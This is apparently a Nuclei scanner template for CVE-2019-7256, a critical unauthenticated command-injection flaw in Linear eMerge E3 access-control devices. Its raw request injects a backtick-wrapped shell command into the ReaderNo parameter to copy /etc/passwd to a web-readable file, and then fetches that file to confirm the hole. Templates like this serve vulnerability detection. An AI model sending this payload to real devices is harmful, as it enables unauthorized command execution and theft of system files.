nuclei-templates/cves/2019/CVE-2019-7256.yaml

41 lines
1.0 KiB
YAML

id: CVE-2019-7256
info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
- https://applied-risk.com/labs/advisories
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2019-7256
cwe-id: CWE-78
tags: cve,cve2019,emerge,rce
requests:
- raw:
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/03